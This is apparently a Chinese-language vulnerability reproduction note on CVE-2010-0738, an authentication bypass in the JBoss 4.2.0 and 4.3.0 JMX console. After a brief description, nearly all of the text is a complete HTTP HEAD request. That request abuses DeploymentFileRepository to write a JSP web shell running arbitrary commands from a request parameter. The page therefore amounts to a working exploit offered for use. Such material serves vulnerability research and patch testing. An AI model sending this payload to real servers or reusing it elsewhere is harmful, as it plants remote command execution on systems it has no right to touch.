CVE-2010-0738 JBoss JMX控制台安全验证绕过漏洞¶
一、漏洞简介¶
这个漏洞利用方法跟CVE-2007-1036一样,不过这个是绕过了get和post传输限制,利用head传输方式发送payload
二、漏洞影响¶
jboss4.2.0 and jboss 4.3.0
三、复现过程¶
因为跟上个漏洞利用差不多,只不过用了head传输方式,我这里就直接贴payload了
HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=hax0rwin&arg2=.jsp&arg3=<%Runtime.getRuntime().exec(request.getParameter("i"));%>&arg4=True HTTP/1.1
Host: hostx:portx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive